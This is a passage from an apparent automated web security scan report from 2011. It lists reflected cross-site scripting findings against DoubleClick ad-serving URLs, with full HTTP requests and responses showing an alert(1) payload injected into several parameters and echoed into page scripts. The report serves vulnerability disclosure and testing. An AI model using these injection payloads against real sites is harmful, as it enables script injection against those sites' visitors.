Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1c88d7"-alert(1)-"6821c14b674&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var f
...[SNIP]...

2.17. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8117d"-alert(1)-"7e74982024a was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q8117d"-alert(1)-"7e74982024a&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q8117d"-alert(1)-"7e74982024a&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

2.18. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64633"-alert(1)-"82f4d6621e2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l64633"-alert(1)-"82f4d6621e2&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
click%3Bh%3Dv8/3b02/f/1a3/%2a/m%3B239256273%3B0-0%3B0%3B61534219%3B4307-300/250%3B41414511/41432298/1%3B%3B%7Eokv%3D%3Bpc%3DgdncID5TgIAAAA%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l64633"-alert(1)-"82f4d6621e2&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_g
...[SNIP]...

2.19. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 118ea"-alert(1)-"9a2ca46d5eb was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=118ea"-alert(1)-"9a2ca46d5eb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7402
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:23 GMT
Expires: Mon, 09 May 2011 15:36:23 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
i4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=118ea"-alert(1)-"9a2ca46d5ebhttp://www.progressive.com/insurance/discounts/display.aspx?&code=9903600331");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...

2.20. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3576"-alert(1)-"0cedd303306 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQBa3576"-alert(1)-"0cedd303306&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:35:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
vbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQBa3576"-alert(1)-"0cedd303306&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/cre/scoreboard-display.aspx%3F%26code%3D9903600269");
var fscUrl = url;
v
...[SNIP]...

2.21. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29706"-alert(1)-"604da592d10 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-674362252520257229706"-alert(1)-"604da592d10&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
CAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-674362252520257229706"-alert(1)-"604da592d10&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dnyp");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

2.22. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf6f4"-alert(1)-"a73c9128e07 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1cf6f4"-alert(1)-"a73c9128e07&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
TcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1cf6f4"-alert(1)-"a73c9128e07&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dny
...[SNIP]...

2.23. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30950"-alert(1)-"246a968b642 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw30950"-alert(1)-"246a968b642&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
b25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw30950"-alert(1)-"246a968b642&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/cre/scoreboard-display.aspx%3F%26code%3D9903600269");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

2.24. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982c"-alert(1)-"f7eecd04480 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=le982c"-alert(1)-"f7eecd04480&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
